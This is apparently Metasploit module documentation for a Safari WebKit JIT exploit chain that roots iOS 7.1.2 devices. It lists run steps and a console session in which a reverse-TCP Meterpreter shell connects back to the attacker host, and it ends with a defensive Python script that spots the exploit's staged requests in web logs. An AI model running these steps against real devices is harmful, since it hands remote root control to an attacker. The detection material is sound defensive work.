## Vulnerable Application

This module exploits a JIT optimization bug in Safari's WebKit (JavaScriptCore). This lets us
write shellcode into an RWX memory region in JavaScriptCore and execute it. The
shellcode contains a kernel exploit (CVE-2016-4669) that obtains kernel read/write,
escalates to root and disables code signing. Finally, the meterpreter payload is
downloaded and executed.

This module has been tested against iOS 7.1.2 on an iPhone 4.

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/apple_ios/browser/safari_jit`
1. Do: `set lhost [ip]`
1. Do: `set srvhost [ip]`
1. Do: `run`
1. Browse to the website with a vulnerable device
1. You should get a root shell.

## Options

### DEBUG_EXPLOIT

Show debug information during exploitation. This adds entries to the iPhone syslog related to exploitation and
loading of the payload. Defaults to `false`.

## Scenarios
### iPhone 4 with iOS 7.1.2

```
msf5 > use exploit/apple_ios/browser/safari_jit
[*] Using configured payload apple_ios/armle/meterpreter_reverse_tcp
msf5 exploit(apple_ios/browser/safari_jit) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set srvhost 1.1.1.1
srvhost => 1.1.1.1
msf5 exploit(apple_ios/browser/safari_jit) > set verbose true
verbose => true
msf5 exploit(apple_ios/browser/safari_jit) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(apple_ios/browser/safari_jit) > 
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Using URL: http://1.1.1.1:8080/
[*] Server started.
[*] 2.2.2.2    safari_jit - Request / from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /loader.b64?cache=1596557302841 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /macho.b64?cache=1596557303179 from Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
[*] 2.2.2.2    safari_jit - Request /payload from MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0
[+] 2.2.2.2    safari_jit - Target is vulnerable, sending payload!
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:49299) at 2020-08-04 12:08:27 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root @ iPhone (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 2.2.2.2
OS           : iPhone3,3 (iOS 11D257)
Architecture : armv7
BuildTuple   : arm-iphone-darwin
Meterpreter  : armle/apple_ios
```
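From the defender's side, the session above shows what this module leaves in web logs: a single client fetches `/`, then `/loader.b64?cache=...`, then `/macho.b64?cache=...`, and finally `/payload` (the last request comes from the CFNetwork user agent rather than the page's Safari user agent), and the initial User-Agent advertises iOS 7.1.2. The following Python script is an added example and is not part of the module or of Metasploit; it rebuilds that request sequence as constructed Combined Log Format access-log lines (the format, the timestamps, the sizes and the second client `3.3.3.3` are assumptions) and flags any client that walks the loader, macho and payload stages in order, noting whether its User-Agent identifies a legacy iOS 7 build. The stage names are the default paths shown in the output above; treat them as a starting point for a detection rather than a durable signature.

```python
import re
from collections import defaultdict

# Constructed access-log lines (Combined Log Format) modelled on the request
# sequence in the msfconsole output above. Not real logs: timestamps, sizes
# and the 3.3.3.3 client are invented for the example.
SAMPLE_LOG = """\
2.2.2.2 - - [04/Aug/2020:12:08:22 -0400] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2.2.2.2 - - [04/Aug/2020:12:08:23 -0400] "GET /loader.b64?cache=1596557302841 HTTP/1.1" 200 40960 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2.2.2.2 - - [04/Aug/2020:12:08:23 -0400] "GET /macho.b64?cache=1596557303179 HTTP/1.1" 200 81920 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53"
2.2.2.2 - - [04/Aug/2020:12:08:25 -0400] "GET /payload HTTP/1.1" 200 204800 "-" "MobileSafari/9537.53 CFNetwork/672.1.15 Darwin/14.0.0"
3.3.3.3 - - [04/Aug/2020:12:09:01 -0400] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Mobile/15E148 Safari/604.1"
"""

# Combined Log Format: ip ident user [ts] "method path proto" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Stages of the module's delivery chain, in the order a vulnerable client
# requests them. Paths are the defaults visible in the output above; a query
# string (the cache-buster) is allowed after the file name.
STAGES = [
    ("loader", re.compile(r"^/loader\.b64(\?|$)")),
    ("macho", re.compile(r"^/macho\.b64(\?|$)")),
    ("payload", re.compile(r"^/payload(\?|$)")),
]

# iOS 7.x Safari advertises itself as "CPU iPhone OS 7_x_y" in the User-Agent.
IOS7_UA = re.compile(r"CPU iPhone OS 7_\d")


def parse_log(text):
    """Parse Combined Log Format lines into dicts; unparseable lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def stage_of(path):
    """Map a request path to a delivery-chain stage name, or None."""
    for name, pattern in STAGES:
        if pattern.match(path):
            return name
    return None


def detect(records):
    """Return one alert per client that requested the chain's stages in order."""
    seen = defaultdict(list)  # ip -> ordered list of distinct stages observed
    legacy_ua = set()         # ips whose User-Agent claims an iOS 7 build
    for r in records:
        s = stage_of(r["path"])
        if s and s not in seen[r["ip"]]:
            seen[r["ip"]].append(s)
        if IOS7_UA.search(r["ua"]):
            legacy_ua.add(r["ip"])

    expected = [name for name, _ in STAGES]
    alerts = []
    for ip, stages in seen.items():
        if stages == expected:
            severity = "high"    # full loader -> macho -> payload chain observed
        elif len(stages) >= 2:
            severity = "medium"  # partial chain, e.g. a fetch blocked midway
        else:
            continue
        alerts.append({
            "ip": ip,
            "stages": stages,
            "severity": severity,
            "ios7_user_agent": ip in legacy_ua,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_log(SAMPLE_LOG)):
        print(alert)
```

Run on the constructed sample, the detector reports `2.2.2.2` with a high-severity full chain and an iOS 7 User-Agent, and stays silent for `3.3.3.3`, which only loaded the landing page from a current iOS build. Because the payload request arrives with a different User-Agent (CFNetwork), the correlation is keyed on client IP rather than on the UA string.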
